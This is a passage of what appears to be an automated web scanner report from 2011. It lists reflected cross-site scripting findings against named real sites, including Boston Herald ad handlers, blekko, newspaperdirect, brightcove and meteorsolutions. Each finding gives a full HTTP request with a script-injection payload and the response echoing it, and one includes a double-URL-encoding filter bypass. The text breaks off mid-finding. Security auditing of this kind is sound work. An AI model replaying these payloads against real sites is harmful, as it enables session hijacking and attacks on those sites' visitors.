GET /includes/processAds.bg?position=Top29a42"><script>alert(1)</script>f1bf5dd16e2&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2113
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top29a42\"><script>alert(1)</script>f1bf5dd16e2">
...[SNIP]...

4.83. http://blekko.com/autocomplete [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a4d93<script>alert(1)</script>c705977927c was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=raa4d93<script>alert(1)</script>c705977927c HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Sat, 17 Sep 2011 07:44:24 GMT
Vary: Accept-Encoding
Content-Length: 72
X-Blekko-PT: 93cfc820c49a41f46623c49ee1de1a1a

{"suggestions":[],"query":"raa4d93<script>alert(1)</script>c705977927c"}

4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8eb5"><script>alert(1)</script>ac50390d5f8 was submitted in the companion parameter. This input was echoed as b8eb5\"><script>alert(1)</script>ac50390d5f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottomb8eb5"><script>alert(1)</script>ac50390d5f8&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2082
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottomb8eb5\"><script>alert(1)</script>ac50390d5f8!Top">
...[SNIP]...

4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 492df</script><script>alert(1)</script>3d2d1682c3d was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2118
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
R=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d!Top">
...[SNIP]...

4.86. http://bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1c0"><script>alert(1)</script>6c55ca82c3b was submitted in the page parameter. This input was echoed as 6c1c0\"><script>alert(1)</script>6c55ca82c3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle6c1c0"><script>alert(1)</script>6c55ca82c3b HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2082
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article6c1c0\"><script>alert(1)</script>6c55ca82c3b@Top,Right,Middle,Bottom!Top">
...[SNIP]...

4.87. http://bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 was submitted in the page parameter. This input was echoed as 8bca3';alert(1)//54aa045dd55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1986
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article8bca3';alert(1)//54aa045dd55@Top,Right,Middle,Bottom!Top">
...[SNIP]...

4.88. http://bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9a4"><script>alert(1)</script>5a6cecf4080 was submitted in the position parameter. This input was echoed as 4d9a4\"><script>alert(1)</script>5a6cecf4080 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top4d9a4"><script>alert(1)</script>5a6cecf4080&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2077
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top4d9a4\"><script>alert(1)</script>5a6cecf4080">
...[SNIP]...

4.89. http://bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ffc</script><script>alert(1)</script>2d13a9c6857 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top95ffc</script><script>alert(1)</script>2d13a9c6857&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2113
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top95ffc</script><script>alert(1)</script>2d13a9c6857">
...[SNIP]...

4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b357<script>alert(1)</script>dcde2ff62ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=toppictures&datepos=7&language=en&count=20&personalization=0&format=json&callback=HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac&swf=true HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 17 Sep 2011 01:54:38 GMT
Last-Modified: Sat, 17 Sep 2011 01:44:38 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 1
Date: Sat, 17 Sep 2011 01:44:37 GMT
Content-Length: 5965

HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac([{id:"47a9b2b0-91be-400a-8f04-6330867a2c04",key:"2abXk7wkLUHesN7z0Gy4qg==",width:718,fpscale:10,type:"pic",article:{id:"e8459750-9218-41e4-8a6d-5bdc7aaad8fa",page:1,title:"HUMAN GUINEA PIGS",rank:4,po
...[SNIP]...

4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39203%3balert(1)//7c31c657ad7 was submitted in the callback parameter. This input was echoed as 39203;alert(1)//7c31c657ad7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=imgsrvs&callback=HomePageManager._onImgSrvsDataLoaded39203%3balert(1)//7c31c657ad7 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 24 Sep 2011 01:42:38 GMT
Last-Modified: Sat, 17 Sep 2011 01:42:38 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 2
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:42:38 GMT
Content-Length: 220

HomePageManager._onImgSrvsDataLoaded39203;alert(1)//7c31c657ad7(["http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx","http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx"])

4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/check.session

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a4d3<script>alert(1)</script>798bcc7a568 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /epaper/check.session?callback=check_session_callback5a4d3<script>alert(1)</script>798bcc7a568&t=1316239605342 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.9.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 4
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:45:23 GMT
Content-Length: 88

check_session_callback5a4d3<script>alert(1)</script>798bcc7a568({interval:0,timeout:0});

4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload e4004<script>alert(1)</script>f95237046cf was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 554
Origin: http://bostonherald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qfa49d8dcd1acf958feddf0bf286c3afd013add68
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:33:17 GMT
Server:
Content-Length: 5105

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
3.l.Y...eAQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bp.........ivideoPlayere4004<script>alert(1)</script>f95237046cf.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ccca6<script>alert(1)</script>b631027d26d was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1ccca6<script>alert(1)</script>b631027d26d&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:40:49 GMT
Etag: "a4b5740c82ba57098d3f47fe0f640d85a84fd058"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1ccca6<script>alert(1)</script>b631027d26d", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1);

4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 16faf<script>alert(1)</script>25da9310260 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

